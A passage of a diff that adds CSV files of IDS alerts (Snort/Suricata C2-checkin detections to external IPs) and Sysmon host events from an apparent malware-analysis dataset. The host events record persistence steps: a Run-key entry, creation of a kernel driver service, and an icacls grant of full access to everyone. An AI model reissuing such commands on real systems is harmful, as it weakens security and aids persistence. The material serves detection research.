[Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50189 -> 211.159.235.58:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:23:33.342","05/31-13:23:27.839094 [**] [1:2822075:2] ETPRO MALWARE PUA.Sogou Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50189 -> 211.159.235.58:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:21:30.400","05/31/2020-13:21:26.860932 [**] [1:2822181:6] ETPRO MALWARE Bolek HTTP Checkin [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50132 -> 123.125.221.6:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:21:28.329","05/31-13:21:17.209472 [**] [1:2822075:2] ETPRO MALWARE PUA.Sogou Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50113 -> 211.159.235.58:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:21:28.329","05/31-13:21:17.441096 [**] [1:2822075:2] ETPRO MALWARE PUA.Sogou Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50113 -> 211.159.235.58:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:21:28.329","05/31-13:21:16.940514 [**] [1:2822075:2] ETPRO MALWARE PUA.Sogou Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50114 -> 211.159.235.58:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:21:28.329","05/31-13:21:17.651587 [**] [1:2822075:2] ETPRO MALWARE PUA.Sogou Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50113 -> 211.159.235.58:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:21:28.329","05/31-13:21:17.674189 [**] [1:2822075:2] ETPRO MALWARE PUA.Sogou Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50114 -> 211.159.235.58:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:21:28.329","05/31-13:21:17.842692 [**] [1:2822075:2] ETPRO MALWARE PUA.Sogou Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50113 -> 211.159.235.58:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:21:28.329","05/31-13:21:17.855903 [**] [1:2822075:2] ETPRO MALWARE PUA.Sogou Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50114 -> 211.159.235.58:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:21:28.329","05/31-13:21:18.039604 [**] [1:2822075:2] ETPRO MALWARE PUA.Sogou Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50114 -> 211.159.235.58:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:21:28.329","05/31-13:21:18.247578 [**] [1:2822075:2] ETPRO MALWARE PUA.Sogou Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50114 -> 211.159.235.58:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:21:28.329","05/31-13:21:18.343434 [**] [1:2822075:2] ETPRO MALWARE PUA.Sogou Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50119 -> 211.159.235.58:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:21:23.356","05/31/2020-13:21:21.881532 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:50114 -> 211.159.235.58:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:21:20.341","05/31/2020-13:21:19.672411 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:50114 -> 211.159.235.58:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:21:19.332","05/31/2020-13:21:18.522096 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:50119 -> 211.159.235.58:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:21:19.332","05/31/2020-13:21:19.097777 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:50114 -> 211.159.235.58:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:21:19.331","05/31/2020-13:21:18.431421 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:50114 -> 211.159.235.58:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:21:18.329","05/31/2020-13:21:17.392371 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:50113 -> 211.159.235.58:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:21:18.329","05/31/2020-13:21:17.622196 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:50113 -> 211.159.235.58:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:21:18.329","05/31/2020-13:21:17.673228 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:50114 -> 211.159.235.58:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:21:18.329","05/31/2020-13:21:17.835373 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:50113 -> 211.159.235.58:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:21:18.329","05/31/2020-13:21:17.855040 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:50114 -> 211.159.235.58:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:21:18.329","05/31/2020-13:21:18.023926 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:50113 -> 211.159.235.58:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:21:18.329","05/31/2020-13:21:18.037556 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:50114 -> 211.159.235.58:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:21:18.329","05/31/2020-13:21:18.244101 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:50114 -> 211.159.235.58:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:21:03.326","05/31/2020-13:20:55.292405 [**] [1:2008429:10] ET USER_AGENTS Suspicious User-Agent (HttpDownload) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50102 -> 49.51.130.237:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:21:03.326","05/31-13:20:54.985752 [**] [1:2008429:10] ET USER_AGENTS Suspicious User-Agent (HttpDownload) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50102 -> 49.51.130.237:80","/var/log/snort/alert.fast" diff --git a/data/MW_31_HIDS_3.csv b/data/MW_31_HIDS_3.csv new file mode 100644 index 0000000..d83bee8 --- /dev/null +++ b/data/MW_31_HIDS_3.csv @@ -0,0 +1,163 @@ +timestamp,"rule.level","rule.description","data.win.system.message","data.win.eventdata.commandLine","data.win.eventdata.targetObject","full_log","data.win.eventdata.details" +"May 31, 2020 @ 14:19:12.184",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: 'c12e8a73095bad27b1cc02a25306e36f' +New md5sum is : '5002e9cbd059c227b20768b5773a5158' +Old sha1sum was: 'a0ff409933dc115dae27ec11fce7bac75925010f' +New sha1sum is : 'd451102b00da6ad0bf180b4f73a88db73c0000e8' +", +"May 31, 2020 @ 14:19:12.168",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '29446b14184e8caf0aea576ee321f0f4' +New md5sum is : '4106a3aec9d1eebddfcfbf931654376c' +Old sha1sum was: 'bb6ecadefeba5206120a42a61651b3ea7d9a4bb2' +New sha1sum is : 'dbffbab9a0cf7bfda50a68d20d36c21299d2169d' +", +"May 31, 2020 @ 14:19:08.965",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_ENABLE_HTTP2' checksum changed. +Old md5sum was: '3d5dfdf70489c96988a67b733c998d33' +New md5sum is : '19a84742b6b5ff086df143d980ae4afe' +Old sha1sum was: 'f73c7d8c6bd7817bd8c59b3473f67f03e39e5811' +New sha1sum is : '059238efcadea262aecd701312fba26b753c1423' +", +"May 31, 2020 @ 14:19:08.512",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MAXCONNECTIONSPERSERVER' checksum changed. +Old md5sum was: '66f9de40f01f43922ce290fd529be6f6' +New md5sum is : 'd80d1f3cbf8f90f787a0b09282119947' +Old sha1sum was: '79b04ee91b68c25665eef548034ab27c28a642da' +New sha1sum is : '387915cc44190d01197354f7b600e1cd7ccffd55' +", +"May 31, 2020 @ 14:17:45.787",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",,,,, +"May 31, 2020 @ 14:17:35.335",7,"SessionEnv was unavailable to handle a critical notification event","""The winlogon notification subscriber was unavailable to handle a critical notification event.""",,,, +"May 31, 2020 @ 14:16:55.046",9,"Windows Application error event",,,,, +"May 31, 2020 @ 14:11:01.268",9,"Windows Application error event","""Faulting application name: LdBoxHeadless.exe, version: 5.2.30.30462, time stamp: 0x5d56672f +Faulting module name: host_manager.dll, version: 0.0.0.0, time stamp: 0x5ebd172b +Exception code: 0xc0000005 +Fault offset: 0x0000000000002847 +Faulting process id: 0x1f70 +Faulting application start time: 0x01d634eec8284a38 +Faulting application path: C:\Program Files\dnplayerext2\LdBoxHeadless.exe +Faulting module path: C:\Program Files\dnplayerext2\host_manager.dll +Report Id: 11531a4e-af43-4b76-a4d6-18b6a87534a2 +Faulting package full name: +Faulting package-relative application ID: """,,,, +"May 31, 2020 @ 14:10:30.566",10,"ATT&CK T1060: Autorun Keys Modification","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-28 12:51:33.086 +ProcessGuid: {df9fc3d3-b396-5ecf-0000-00105c1f1d00} +ProcessId: 7284 +Image: C:\ChangZhi\LDPlayer\LDPlayer.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\LDNews +Details: C:\ChangZhi\LDPlayer\ldnews.exe""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\LDNews","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:33.226796500Z"",""eventRecordID"":""2675"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-28 12:51:33.086\r\nProcessGuid: {df9fc3d3-b396-5ecf-0000-00105c1f1d00}\r\nProcessId: 7284\r\nImage: C:\\ChangZhi\\LDPlayer\\LDPlayer.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\LDNews\r\nDetails: C:\\ChangZhi\\LDPlayer\\ldnews.exe\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-28 12:51:33.086"",""processGuid"":""{df9fc3d3-b396-5ecf-0000-00105c1f1d00}"",""processId"":""7284"",""image"":""C:\\\\ChangZhi\\\\LDPlayer\\\\LDPlayer.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\LDNews"",""details"":""C:\\\\ChangZhi\\\\LDPlayer\\\\ldnews.exe""}}}","C:\\ChangZhi\\LDPlayer\\ldnews.exe" +"May 31, 2020 @ 14:10:27.581",8,"ATT&CK T1050: New Service Creation","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:29.365 +ProcessGuid: {df9fc3d3-b3d1-5ecf-0000-001089542400} +ProcessId: 7344 +Image: C:\Windows\SysWOW64\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc"" create LdBoxDrv binPath= ""C:\Program Files\dnplayerext2\LdBoxDrv.sys"" type= kernel start= auto +CurrentDirectory: C:\ChangZhi\LDPlayer\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020ce750300} +LogonId: 0x375CE +TerminalSessionId: 1 +IntegrityLevel: High +Hashes: MD5=3A070609B1569EDEBABDC6466E8FA36C,SHA256=23E7F413DEB59EEC7F0769C44C35DD332E2C9838E79BC05EB3EE9D653269E614,IMPHASH=B037D0ADB81BF9CFC651DE01742089F1 +ParentProcessGuid: {df9fc3d3-b3c0-5ecf-0000-001099ea2200} +ParentProcessId: 5136 +ParentImage: C:\ChangZhi\LDPlayer\dnrepairer.exe +ParentCommandLine: ""C:\ChangZhi\LDPlayer\dnrepairer.exe"" listener=197560""","\""C:\\Windows\\system32\\sc\"" create LdBoxDrv binPath= \""C:\\Program Files\\dnplayerext2\\LdBoxDrv.sys\"" type= kernel start= auto",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:29.406430900Z"",""eventRecordID"":""2655"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:29.365\r\nProcessGuid: {df9fc3d3-b3d1-5ecf-0000-001089542400}\r\nProcessId: 7344\r\nImage: C:\\Windows\\SysWOW64\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc\"" create LdBoxDrv binPath= \""C:\\Program Files\\dnplayerext2\\LdBoxDrv.sys\"" type= kernel start= auto\r\nCurrentDirectory: C:\\ChangZhi\\LDPlayer\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020ce750300}\r\nLogonId: 0x375CE\r\nTerminalSessionId: 1\r\nIntegrityLevel: High\r\nHashes: MD5=3A070609B1569EDEBABDC6466E8FA36C,SHA256=23E7F413DEB59EEC7F0769C44C35DD332E2C9838E79BC05EB3EE9D653269E614,IMPHASH=B037D0ADB81BF9CFC651DE01742089F1\r\nParentProcessGuid: {df9fc3d3-b3c0-5ecf-0000-001099ea2200}\r\nParentProcessId: 5136\r\nParentImage: C:\\ChangZhi\\LDPlayer\\dnrepairer.exe\r\nParentCommandLine: \""C:\\ChangZhi\\LDPlayer\\dnrepairer.exe\"" listener=197560\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:29.365"",""processGuid"":""{df9fc3d3-b3d1-5ecf-0000-001089542400}"",""processId"":""7344"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc\\\"" create LdBoxDrv binPath= \\\""C:\\\\Program Files\\\\dnplayerext2\\\\LdBoxDrv.sys\\\"" type= kernel start= auto"",""currentDirectory"":""C:\\\\ChangZhi\\\\LDPlayer\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020ce750300}"",""logonId"":""0x375ce"",""terminalSessionId"":""1"",""integrityLevel"":""High"",""hashes"":""MD5=3A070609B1569EDEBABDC6466E8FA36C,SHA256=23E7F413DEB59EEC7F0769C44C35DD332E2C9838E79BC05EB3EE9D653269E614,IMPHASH=B037D0ADB81BF9CFC651DE01742089F1"",""parentProcessGuid"":""{df9fc3d3-b3c0-5ecf-0000-001099ea2200}"",""parentProcessId"":""5136"",""parentImage"":""C:\\\\ChangZhi\\\\LDPlayer\\\\dnrepairer.exe"",""parentCommandLine"":""\\\""C:\\\\ChangZhi\\\\LDPlayer\\\\dnrepairer.exe\\\"" listener=197560""}}}", +"May 31, 2020 @ 14:10:13.962",10,"ATT&CK T1222: File or Folder Permissions Modifications","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:14.671 +ProcessGuid: {df9fc3d3-b3c2-5ecf-0000-0010d7612300} +ProcessId: 6724 +Image: C:\Windows\SysWOW64\icacls.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: iCACLS.EXE +CommandLine: ""icacls"" ""C:\ChangZhi\LDPlayer\vms"" /grant everyone:F /t +CurrentDirectory: C:\ChangZhi\LDPlayer\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020ce750300} +LogonId: 0x375CE +TerminalSessionId: 1 +IntegrityLevel: High +Hashes: MD5=BD5694D5E2843F93882085800BF642BC,SHA256=9715995597D0AB2F3FF7E9A450D4EEE3F5B89D44150F8E1493541E18D76C3BB4,IMPHASH=019F88299D7F5E77F17221DA15112A43 +ParentProcessGuid: {df9fc3d3-b3c0-5ecf-0000-001099ea2200} +ParentProcessId: 5136 +ParentImage: C:\ChangZhi\LDPlayer\dnrepairer.exe +ParentCommandLine: ""C:\ChangZhi\LDPlayer\dnrepairer.exe"" listener=197560""","\""icacls\"" \""C:\\ChangZhi\\LDPlayer\\vms\"" /grant everyone:F /t",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:14.709897300Z"",""eventRecordID"":""2406"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:14.671\r\nProcessGuid: {df9fc3d3-b3c2-5ecf-0000-0010d7612300}\r\nProcessId: 6724\r\nImage: C:\\Windows\\SysWOW64\\icacls.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: \r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: iCACLS.EXE\r\nCommandLine: \""icacls\"" \""C:\\ChangZhi\\LDPlayer\\vms\"" /grant everyone:F /t\r\nCurrentDirectory: C:\\ChangZhi\\LDPlayer\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020ce750300}\r\nLogonId: 0x375CE\r\nTerminalSessionId: 1\r\nIntegrityLevel: High\r\nHashes: MD5=BD5694D5E2843F93882085800BF642BC,SHA256=9715995597D0AB2F3FF7E9A450D4EEE3F5B89D44150F8E1493541E18D76C3BB4,IMPHASH=019F88299D7F5E77F17221DA15112A43\r\nParentProcessGuid: {df9fc3d3-b3c0-5ecf-0000-001099ea2200}\r\nParentProcessId: 5136\r\nParentImage: C:\\ChangZhi\\LDPlayer\\dnrepairer.exe\r\nParentCommandLine: \""C:\\ChangZhi\\LDPlayer\\dnrepairer.exe\"" listener=197560\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:14.671"",""processGuid"":""{df9fc3d3-b3c2-5ecf-0000-0010d7612300}"",""processId"":""6724"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\icacls.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""iCACLS.EXE"",""commandLine"":""\\\""icacls\\\"" \\\""C:\\\\ChangZhi\\\\LDPlayer\\\\vms\\\"" /grant everyone:F /t"",""currentDirectory"":""C:\\\\ChangZhi\\\\LDPlayer\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020ce750300}"",""logonId"":""0x375ce"",""terminalSessionId"":""1"",""integrityLevel"":""High"",""hashes"":""MD5=BD5694D5E2843F93882085800BF642BC,SHA256=9715995597D0AB2F3FF7E9A450D4EEE3F5B89D44150F8E1493541E18D76C3BB4,IMPHASH=019F88299D7F5E77F17221DA15112A43"",""parentProcessGuid"":""{df9fc3d3-b3c0-5ecf-0000-001099ea2200}"",""parentProcessId"":""5136"",""parentImage"":""C:\\\\ChangZhi\\\\LDPlayer\\\\dnrepairer.exe"",""parentCommandLine"":""\\\""C:\\\\ChangZhi\\\\LDPlayer\\\\dnrepairer.exe\\\"" listener=197560""}}}", +"May 31, 2020 @ 14:10:13.705",8,"ATT&CK T1035: Service Execution","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:13.820 +ProcessGuid: {df9fc3d3-b3c1-5ecf-0000-0010f9152300} +ProcessId: 8100 +Image: C:\Windows\SysWOW64\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 start cryptsvc +CurrentDirectory: C:\ChangZhi\LDPlayer\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020ce750300} +LogonId: 0x375CE +TerminalSessionId: 1 +IntegrityLevel: High +Hashes: MD5=DACD2D80B3942C3064B29BC0D0382EF3,SHA256=912FC9A2D5B52831C9C70643DEAB9726EC25C06E01AADE69FE844F4BA653AC7A,IMPHASH=F44A3CB56AC156111E03B2437FC54F18 +ParentProcessGuid: {df9fc3d3-b3c1-5ecf-0000-00102b092300} +ParentProcessId: 8040 +ParentImage: C:\Windows\SysWOW64\net.exe +ParentCommandLine: ""net"" start cryptsvc""","C:\\Windows\\system32\\net1 start cryptsvc",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:13.825315900Z"",""eventRecordID"":""2393"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:13.820\r\nProcessGuid: {df9fc3d3-b3c1-5ecf-0000-0010f9152300}\r\nProcessId: 8100\r\nImage: C:\\Windows\\SysWOW64\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 start cryptsvc\r\nCurrentDirectory: C:\\ChangZhi\\LDPlayer\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020ce750300}\r\nLogonId: 0x375CE\r\nTerminalSessionId: 1\r\nIntegrityLevel: High\r\nHashes: MD5=DACD2D80B3942C3064B29BC0D0382EF3,SHA256=912FC9A2D5B52831C9C70643DEAB9726EC25C06E01AADE69FE844F4BA653AC7A,IMPHASH=F44A3CB56AC156111E03B2437FC54F18\r\nParentProcessGuid: {df9fc3d3-b3c1-5ecf-0000-00102b092300}\r\nParentProcessId: 8040\r\nParentImage: C:\\Windows\\SysWOW64\\net.exe\r\nParentCommandLine: \""net\"" start cryptsvc\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:13.820"",""processGuid"":""{df9fc3d3-b3c1-5ecf-0000-0010f9152300}"",""processId"":""8100"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 start cryptsvc"",""currentDirectory"":""C:\\\\ChangZhi\\\\LDPlayer\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020ce750300}"",""logonId"":""0x375ce"",""terminalSessionId"":""1"",""integrityLevel"":""High"",""hashes"":""MD5=DACD2D80B3942C3064B29BC0D0382EF3,SHA256=912FC9A2D5B52831C9C70643DEAB9726EC25C06E01AADE69FE844F4BA653AC7A,IMPHASH=F44A3CB56AC156111E03B2437FC54F18"",""parentProcessGuid"":""{df9fc3d3-b3c1-5ecf-0000-00102b092300}"",""parentProcessId"":""8040"",""parentImage"":""C:\\\\Windows\\\\SysWOW64\\\\net.exe"",""parentCommandLine"":""\\\""net\\\"" start cryptsvc""}}}", +"May 31, 2020 @ 14:10:13.679",8,"ATT&CK T1035: Service Execution","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:13.698 +ProcessGuid: {df9fc3d3-b3c1-5ecf-0000-00102b092300} +ProcessId: 8040 +Image: C:\Windows\SysWOW64\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""net"" start cryptsvc +CurrentDirectory: C:\ChangZhi\LDPlayer\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020ce750300} +LogonId: 0x375CE +TerminalSessionId: 1 +IntegrityLevel: High +Hashes: MD5=2D09708A2B7FD7391E50A1A8E4915BD7,SHA256=A0D28F866A78EE1BFE0CF40A9713078856F9F39258AD34E5D6E6D9227BEB1F56,IMPHASH=AC592B83B5CAEB41A6F6DF7DB53F9076 +ParentProcessGuid: {df9fc3d3-b3c0-5ecf-0000-001099ea2200} +ParentProcessId: 5136 +ParentImage: C:\ChangZhi\LDPlayer\dnrepairer.exe +ParentCommandLine: ""C:\ChangZhi\LDPlayer\dnrepairer.exe"" listener=197560""","\""net\"" start cryptsvc",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:13.712761100Z"",""eventRecordID"":""2392"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:13.698\r\nProcessGuid: {df9fc3d3-b3c1-5ecf-0000-00102b092300}\r\nProcessId: 8040\r\nImage: C:\\Windows\\SysWOW64\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft 